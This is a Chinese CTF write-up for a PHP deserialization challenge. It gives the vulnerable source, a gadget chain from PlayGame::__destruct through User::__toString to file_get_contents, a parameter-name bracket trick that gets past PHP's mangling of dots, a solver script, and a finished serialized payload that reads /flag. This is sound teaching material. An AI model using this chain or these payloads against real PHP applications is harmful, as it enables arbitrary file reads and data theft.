PlayGame(php反序列化,[绕过)
题目:
<?php
/*
PolarD&N CTF
*/
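class User{
    // Gadget class: a plain data holder whose __toString() is what the
    // PlayGame destructor reaches when `name` holds an object. All properties
    // are public, so unserialize() populates them directly; the setters below
    // are not used by the deserialization chain at all.
    public $name;
    public $age;
    public $sex;

    // String form "name:<name>age:<age>sex:<sex>". If any property holds an
    // object, the concatenation calls that object's __toString() — this is the
    // pivot the exploit relies on (name = PlayGame).
    public function __toString()
    {
        return "name:".$this->name."age:".$this->age."sex:".$this->sex;
    }
    public function setName($name){
        $this->name=$name;
    }
    // Fixed: the original wrote `$this->$age=$age` (a variable property name),
    // which created a dynamic property named after the *value* and left
    // $this->age untouched.
    public function setAge($age){
        $this->age=$age;
    }
    // Same fix as setAge(); the original had `$this->$sex=$sex`.
    public function setSex($sex){
        $this->sex=$sex;
    }
}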
class PlayGame{
// Gadget class. After unserialize() both properties are attacker-chosen:
// `user` is whatever object the payload puts there and `gameFile` is handed
// to file_get_contents() with no validation, so controlling this object
// means choosing which file on the server gets read.
public $user;
// Default game file; the exploit overwrites it (e.g. "/flag").
public $gameFile="./game";
// Reads $this->gameFile unchecked (arbitrary file read); returns false on failure.
public function openGame(){
return file_get_contents($this->gameFile);
}
// Chain entry point: runs when the deserialized object is destroyed.
// Concatenating $this->user->name with a string calls __toString() on
// whatever object sits in `name` (here a User, then through it a PlayGame).
public function __destruct()
{
echo $this->user->name."GameOver!";
}
// Reached when a PlayGame instance is used as a string (e.g. as User::name
// from the destructor above). Calls openGame(), so the file contents end up
// in the echoed output. Note the concatenation order: user->name and
// user->age are read first; with user == null that only raises warnings.
public function __toString(){
return $this->user->name."PlayGame ". $this->user->age . $this->openGame();
}
}
// Script entry point.
// NOTE(security): unserialize() on raw request input is the vulnerability —
// the client can instantiate any loaded class (User, PlayGame) with chosen
// property values, so their __destruct()/__toString() run on attacker data.
// Untrusted input should be decoded with json_decode() instead.
// The parameter name contains a '.', which PHP mangles to '_' in $_GET keys;
// the writeup's `?polar[flag.flag=` form reaches this key because an
// unmatched '[' is turned into '_' and stops further mangling.
$payload = $_GET['polar_flag.flag'] ?? null;
if ($payload !== null) {
    unserialize($payload);
} else {
    highlight_file(__FILE__);
}
思路:
入口类是 PlayGame 的 __destruct 方法：令 $this->user 为 User 对象，echo 时的字符串拼接会触发 User 的 __toString；再令 User 的 $this->name 为另一个 PlayGame 对象，拼接时触发 PlayGame 的 __toString，其中调用 openGame() 用 file_get_contents 读取 $gameFile（设为 /flag）。内层 PlayGame 的 user 为 null，访问 null->name 只产生 warning，不影响读文件。参数名 polar_flag.flag 含有点号：PHP 会把 GET 参数名里的 . 和空格转成 _，直接传 polar_flag.flag 会被改写成 polar_flag_flag；而参数名中出现未闭合的 [ 时，PHP 会把这个 [ 转成 _ 并停止对后续字符的转换，所以用 polar[flag.flag 即可得到 polar_flag.flag。
script:
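// Build the gadget chain. Requires the challenge's User and PlayGame classes
// to be loaded in this script (they are not defined here).
//   $b (PlayGame) is destroyed  -> echo $b->user->name . "GameOver!"
//   $b->user is $a (User), $a->name is $c (PlayGame) -> $c->__toString()
//   $c->__toString() calls $c->openGame() -> file_get_contents($c->gameFile)
$a = new User();
$b = new PlayGame();
$c = new PlayGame();
$b->user = $a;          // destructor reads $b->user->name
$a->name = $c;          // concatenating $c invokes PlayGame::__toString()
$c->gameFile = "/flag"; // file the chain reads; $c->user stays null (warnings only)

$payload = serialize($b);
echo $payload, "\n";
// URL-encode the value before placing it in the query string so no byte is
// reinterpreted by the server. The parameter name keeps a raw '[' on purpose:
// PHP turns an unmatched '[' into '_' and stops mangling the rest of the
// name, so "polar[flag.flag" arrives as "polar_flag.flag".
echo 'polar[flag.flag=' . urlencode($payload), "\n";
// When this script ends, $b's own destructor fires locally and prints the
// same chain output (plus warnings); that is harmless.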
?polar[flag.flag=O:8:"PlayGame":2:{s:4:"user";O:4:"User":3:{s:4:"name";O:8:"PlayGame":2:{s:4:"user";N;s:8:"gameFile";s:5:"/flag";}s:3:"age";N;s:3:"sex";N;}s:8:"gameFile";s:6:"./game";}